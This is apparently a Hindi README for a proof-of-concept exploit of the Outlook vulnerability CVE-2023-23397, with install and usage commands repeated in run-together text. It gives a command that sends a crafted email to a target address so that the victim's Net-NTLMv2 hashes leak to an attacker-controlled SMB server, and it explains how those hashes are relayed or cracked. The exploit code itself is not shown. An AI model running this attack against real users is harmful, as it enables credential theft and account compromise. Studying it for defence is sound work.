
CVE-2023-23397 PoC
यह CVE-2023-23397 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण है, जो Windows Microsoft Outlook क्लाइंट में एक कमजोरी है।
pywin32 पैकेजpip install pywin32 चलाकर आवश्यक pywin32 पैकेज स्थापित करें।python Exploit.py <save_or_send> <target_email> <attacker_ip>।pip install pywin32 चलाकर आवश्यक pywin32 पैकेज स्थापित करें।python Exploit.py <save_or_send> <target_email> <attacker_ip>।<save_or_send>: "save" या "send" के बीच चुनें। "save" दुर्भावनापूर्ण ईमेल को फ़ाइल के रूप में सहेजेगा, जबकि "send" ईमेल को सीधे लक्ष्य को भेजेगा।<target_email>: लक्ष्य उपयोगकर्ता का ईमेल पता।<attacker_ip>: आक्रमणकारी के SMB सर्वर का IP पता।यह CVE-2023-23397 का एक उच्च-स्तरीय अवलोकन है, जो Windows Microsoft Outlook क्लाइंट में एक कमजोरी है।
CVE-2023-23397 एक ऐसी कमजोरी है जो एक आक्रमणकारी को एक दुर्भावनापूर्ण ईमेल तैयार करने की अनुमति देती है, जिसे Outlook क्लाइंट द्वारा संसाधित करने पर स्वचालित रूप से लक्ष्य उपयोगकर्ता के Net-NTLMv2 हैश लीक हो जाते हैं। शोषण को ट्रिगर करने के लिए किसी उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती है। लीक किए गए हैश का उपयोग रिले हमलों के लिए या अंतर्निहित क्रेडेंशियल्स को क्रैक करने के लिए किया जा सकता है।
यह कमजोरी Outlook द्वारा ईमेल संदेशों में PidLidReminderFileParameter गुण को संभालने के तरीके के कारण मौजूद है। यह गुण संदेश प्रेषक को मीटिंग सूचनाओं जैसी वस्तुओं के लिए एक कस्टम सूचना ध्वनि सेट करने की अनुमति देता है। एक कस्टम PidLidReminderFileParameter गुण वाला संदेश तैयार करके जिसमें आक्रमणकारी-नियंत्रित SMB सर्वर की ओर इंगित करने वाला एक Universal Naming Convention (UNC) पथ होता है, आक्रमणकारी लक्ष्य के Outlook क्लाइंट को SMB सर्वर से कनेक्ट होने पर Net-NTLMv2 हैश लीक करने का कारण बना सकता है।
प्रदान की गई प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण स्क्रिप्ट कस्टम PidLidReminderFileParameter गुण के साथ एक दुर्भावनापूर्ण ईमेल उत्पन्न करती है और इसे या तो फ़ाइल के रूप में सहेजती है या सीधे लक्ष्य ईमेल पते पर भेजती है। आक्रमणकारी को लीक किए गए Net-NTLMv2 हैश को कैप्चर करने के लिए एक SMB सर्वर स्थापित करने की आवश्यकता होती है।
यह उच्च-स्तरीय अवलोकन केवल शैक्षिक उद्देश्यों के लिए है। कमजोरी और इसके प्रभाव को समझने से सुरक्षा प्रथाओं में सुधार करने और समान हमलों के खिलाफ प्रभावी बचाव विकसित करने में मदद मिल सकती है।